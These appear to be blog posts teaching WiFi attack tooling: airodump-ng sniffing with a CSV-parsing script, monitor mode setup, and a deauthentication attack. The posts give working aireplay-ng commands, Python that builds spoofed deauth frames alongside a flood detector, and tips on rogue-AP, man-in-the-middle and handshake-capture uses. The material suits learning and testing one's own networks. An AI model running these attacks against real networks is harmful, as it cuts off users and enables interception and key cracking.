Taylor Jolin

28 May

Packet Sniffing with Airodump-ng

Airodump-ng is part of the Aircrack-ng suite. It is a packet sniffer: with the wireless interface in monitor mode it captures raw 802.11 frames, lists the access points and client stations it sees, and can write everything to a capture file for later analysis.

DISCLAIMER: As I have said before, I am not responsible if you choose to do something stupid and get yourself arrested. Hack legally and hack friendly!

How to use Airodump-ng

  1. First we must enable monitor mode on our interface. If you do not know how, see the monitor mode post further down this page.
  2. Next, enter the following command to begin the program: airodump-ng INTERFACE_NAME
    NOTE: This program will run until you force it to quit (Ctrl+C). Add -w PREFIX if you want what it sees saved to PREFIX-01.cap and PREFIX-01.csv; without it nothing is written to disk.

Now analyze the data you retrieve. The top of the screen lists the access points, one row per BSSID (the AP's MAC address); below it is a list of the client stations seen and which BSSID each one is talking to.

Below is a list and explanation of what you will see.

BSSID     Node's MAC address
PWR       Signal strength in dBm (-40 is stronger than -80)
Beacons   Frames sent by the network to broadcast its existence
# Data    Number of data packets
# /s      Number of data packets per second, measured over the past 10 seconds
CH        Channel the network broadcasts on
MB        Maximum bandwidth (speed) supported
ENC       Encryption type
Cipher    Cipher used in network encryption
AUTH      Authentication used in the network
ESSID     Name of the network
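The columns above are exactly what ends up in the CSV that airodump-ng writes when you pass -w PREFIX. The following is an added example for this post, not code from the aircrack-ng project: it parses such a PREFIX-01.csv offline, links each station to its access point and flags the open and WEP networks. The CSV embedded in it is constructed for the example in the layout of a real airodump-ng file (access points first, a blank line, then stations; unassociated stations carry "(not associated)" in the BSSID column); the field order is the one airodump-ng uses, and the function and variable names are my own.

```python
"""Parse airodump-ng's CSV output (PREFIX-01.csv) into APs and stations.

Added example for this post, not part of the aircrack-ng suite.
"""
import csv
import io

# Constructed sample in airodump-ng's CSV layout (not a real capture).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2023-05-28 12:00:01, 2023-05-28 12:05:30,  6,  54, WPA2, CCMP, PSK, -41,   120,   340,   0.  0.  0.  0,   7, HomeNet, 
AA:BB:CC:DD:EE:01, 2023-05-28 12:00:02, 2023-05-28 12:05:29, 36, 866, WPA2, CCMP, PSK, -67,    88,     0,   0.  0.  0.  0,   9, Office-5G, 
AA:BB:CC:DD:EE:02, 2023-05-28 12:00:05, 2023-05-28 12:05:10, 11,  54, OPN,  ,  , -75,    30,     0,   0.  0.  0.  0,  10, FreeCoffee, 
AA:BB:CC:DD:EE:03, 2023-05-28 12:01:00, 2023-05-28 12:04:00,  1,  11, WEP, WEP, , -80,    12,   512,   0.  0.  0.  0,   6, OldCam, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
55:66:77:88:99:00, 2023-05-28 12:00:10, 2023-05-28 12:05:20, -50,   250, 00:11:22:33:44:55, HomeNet
55:66:77:88:99:01, 2023-05-28 12:02:00, 2023-05-28 12:05:00, -60,    12, (not associated) , HomeNet,Office-5G
"""


def _rows(section):
    """Split one CSV section into (header, rows) with every field stripped."""
    reader = csv.reader(io.StringIO(section), skipinitialspace=True)
    rows = [[field.strip() for field in row] for row in reader if row]
    return rows[0], rows[1:]


def parse_airodump_csv(text):
    """Return ({bssid: ap_info}, [station_info]) from airodump-ng CSV text."""
    text = text.replace("\r\n", "\n").strip()
    ap_part, sta_part = text.split("\n\n", 1)   # blank line separates the sections

    aps = {}
    _hdr, ap_rows = _rows(ap_part)
    for r in ap_rows:
        # Field order: BSSID, first seen, last seen, channel, speed, privacy,
        # cipher, auth, power, beacons, IVs, LAN IP, ID length, ESSID, key
        aps[r[0]] = {
            "channel": int(r[3]), "speed": int(r[4]), "privacy": r[5],
            "cipher": r[6], "auth": r[7], "power": int(r[8]),
            "beacons": int(r[9]), "essid": r[13], "clients": [],
        }

    stations = []
    _hdr, sta_rows = _rows(sta_part)
    for r in sta_rows:
        # Field order: MAC, first seen, last seen, power, packets, BSSID, probes...
        bssid = None if r[5] == "(not associated)" else r[5]
        sta = {"mac": r[0], "power": int(r[3]), "packets": int(r[4]),
               "bssid": bssid, "probes": [p for p in r[6:] if p]}
        stations.append(sta)
        if bssid in aps:
            aps[bssid]["clients"].append(sta["mac"])
    return aps, stations


def weak_networks(aps):
    """BSSIDs with no encryption (OPN) or a broken one (WEP): the first things to flag."""
    return sorted(b for b, ap in aps.items() if ap["privacy"] in ("OPN", "WEP"))


def summary(aps):
    """One line per AP, strongest signal first, in the order of the airodump-ng columns."""
    ordered = sorted(aps.items(), key=lambda kv: kv[1]["power"], reverse=True)
    return [f"{b} ch{a['channel']:>3} {a['power']:>4}dBm {a['privacy']:<5} "
            f"{a['cipher']:<5} {a['auth']:<4} {a['essid']} clients={len(a['clients'])}"
            for b, a in ordered]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    print("\n".join(summary(aps)))
    print("weak:", weak_networks(aps))
    for s in stations:
        print(s["mac"], "->", s["bssid"] or "(not associated)", "probing", s["probes"])
```

The probe list of unassociated stations is worth keeping: a client calling out for "HomeNet" while sitting next to your test network is exactly the behaviour an evil-twin setup abuses.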

NOTE: The best adapter to use to sniff packets across networks is the Alfa Network AWUS036AC* series. The one I am using is the AWUS036ACS, which is small and fits neatly into my bag. I also have a multitude of antennas to use for wireless sniffing.

How to listen to 5 GHz channels

By default, Airodump-ng only hops over the 2.4 GHz channels, so to scan the 5 GHz band do the following:

  1. Start Airodump-ng with the band argument: airodump-ng --band a INTERFACE_NAME

You can also specify multiple bands using the band argument. For example:
airodump-ng --band abg INTERFACE_NAME

NOTE: Your wireless card (and its driver) needs to support 5 GHz; iw phy lists the frequencies each band of the card can tune to. Also keep in mind that hopping across both bands visits each channel less often, so you collect fewer frames per network. Once you have found your target, lock onto it with --channel N (and --bssid) instead of hopping.

28 May

How to enter Monitor Mode for WiFi Hacking

Monitor mode makes the card hand every 802.11 frame it hears to the host, not just frames addressed to it, without being associated to any network. Using a program such as Wireshark, you can then rebuild and analyze these packet captures.

  1. First check the status of the wireless interface and see what mode it is in using: iwconfig
  2. Next we must bring our selected interface down using: ifconfig INTERFACE_NAME down
  3. This step may be optional, but in most cases you will want to stop the services that interfere with a capture (NetworkManager, wpa_supplicant, dhclient), because they will fight you for the card and switch channels behind your back. airmon-ng check lists them; airmon-ng check kill stops them.
    • NOTE: If you would rather stop them yourself, take the PIDs that airmon-ng check prints and use: kill PID
  4. Now we will enable monitor mode. To do so use the following: iwconfig INTERFACE_NAME mode monitor (on newer systems: iw dev INTERFACE_NAME set type monitor)
  5. Finally, you must re-enable the interface using: ifconfig INTERFACE_NAME up
  6. Test to make sure you are in monitor mode using: iwconfig (the interface should show Mode:Monitor)

airmon-ng start INTERFACE_NAME performs steps 2 to 5 in one go; it usually creates a separate monitor interface (such as wlan0mon) and that is the name you then pass to airodump-ng and aireplay-ng.

27 May

How to perform a WiFi De-authentication Attack

This is an old one but a fun one. I love doing this in my test environment and I have a lot of fun using this to prank my friends that choose to connect to it.

DISCLAIMER: Do not perform this attack on any network that you do not own. I am not responsible for any illegal use of this attack.

Now, I am assuming that you already know the basics of aircrack-ng and its suite of products.

This attack lets us knock any device off a network by sending spoofed 802.11 deauthentication frames that look as if they came from the access point (or from the client). Management frames are not authenticated on WEP, WPA and WPA2 networks, which is why:

  • Works on encrypted networks (WEP, WPA & WPA2)
  • No need to know the network key
  • No need to connect to the network

The exception is 802.11w Protected Management Frames: where the AP and the client both use PMF (mandatory in WPA3, optional on WPA2), deauthentication frames are authenticated and the spoofed ones are simply dropped.

In order to do this, use the following:
aireplay-ng --deauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]

[#DeauthPackets] is the number of deauth bursts to send; 0 means keep sending until you stop it. Leave out -c and the deauth is broadcast to every client of the AP.

For example:
aireplay-ng --deauth 100000000 -a 00:11:22:33:44:55 -c 55:66:77:88:99:00 mon0

NOTE: The card must be on the same channel as the target AP, otherwise the frames never reach it, so in most cases you will run Airodump-ng locked to that channel at the same time (which also lets you watch the client drop off). Run it in another terminal using:
airodump-ng --bssid 00:11:22:33:44:55 --channel 2 mon0

This trick is handy in social engineering cases and Man-in-the-Middle attacks, for example to push a client onto a rogue AP. You can also use it to capture the handshake: when the deauthenticated client reconnects it performs the WPA 4-way handshake again, airodump-ng records it, and that handshake is what WPA cracking works on.
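To make the attack concrete, and to show what a defender should look for, here is an added example that is not aireplay-ng's code: it builds the deauthentication frame the command above sends (a 24-byte 802.11 management header followed by a 2-byte reason code), parses such frames back, and counts them per BSSID the way a simple flood detector would. It assumes raw 802.11 frames without a radiotap header or FCS, uses reason code 7 because that is the code aireplay-ng reports in its "Sending 64 directed DeAuth (code 7)" output, and the threshold of 32 frames is my own choice based on aireplay-ng sending 64 frames in each direction per burst. Nothing in it transmits; the frames and addresses are constructed for the example.

```python
"""Build, parse and count 802.11 deauthentication frames.

Added example for this post; not aireplay-ng's code and nothing here transmits.
Frames are raw 802.11 (no radiotap header, no FCS).
"""
import struct
from collections import Counter

# Frame Control for deauthentication: protocol version 0, type 0 (management),
# subtype 12 (deauth), no flags -> bytes C0 00 on the wire.
DEAUTH_FC = 0x00C0
HEADER_FMT = "<HH6s6s6sH"                 # FC, duration, addr1, addr2, addr3, seq ctrl
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 24 bytes
REASON_CLASS3_NONASSOC = 7                # "Class 3 frame received from nonassociated STA"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst, src, bssid, reason=REASON_CLASS3_NONASSOC, seq=0):
    """Deauth frame addressed to dst, claiming to come from src, for network bssid."""
    header = struct.pack(HEADER_FMT, DEAUTH_FC, 0,
                         mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def deauth_pair(ap, client, seq=0):
    """What one deauth does: a frame to the client 'from' the AP and one to the AP
    'from' the client, so both ends drop the association."""
    return [build_deauth(client, ap, ap, seq=seq), build_deauth(ap, client, ap, seq=seq)]


def parse_deauth(frame):
    """Addresses and reason code of a deauth frame, or None for any other frame."""
    if len(frame) < HEADER_LEN + 2:
        return None
    fc, _dur, a1, a2, a3, _sc = struct.unpack(HEADER_FMT, frame[:HEADER_LEN])
    if fc & 0x00FC != DEAUTH_FC:          # type/subtype bits only; ignore version and flags
        return None
    (reason,) = struct.unpack("<H", frame[HEADER_LEN:HEADER_LEN + 2])
    return {"dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3), "reason": reason}


def detect_deauth_flood(frames, threshold=32):
    """Count deauth frames per BSSID and return the ones at or above threshold.

    A client roaming or an AP idling one station out produces a frame or two;
    a burst from aireplay-ng is 64 frames each way, so a few dozen per BSSID in
    one capture is a strong signal of an attack (threshold is an assumption)."""
    counts = Counter()
    for frame in frames:
        parsed = parse_deauth(frame)
        if parsed:
            counts[parsed["bssid"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    ap, client = "00:11:22:33:44:55", "55:66:77:88:99:00"   # MACs from the post
    burst = [f for i in range(64) for f in deauth_pair(ap, client, seq=i)]
    print(parse_deauth(burst[0]))
    print("flood:", detect_deauth_flood(burst))
```

Note that the detector keys on addr3 (the BSSID), so it catches both directions of the spoofed pair as well as broadcast deauths sent without -c; a sequence-number check against the AP's real beacons is the next refinement, since aireplay-ng's counter will not line up with the AP's.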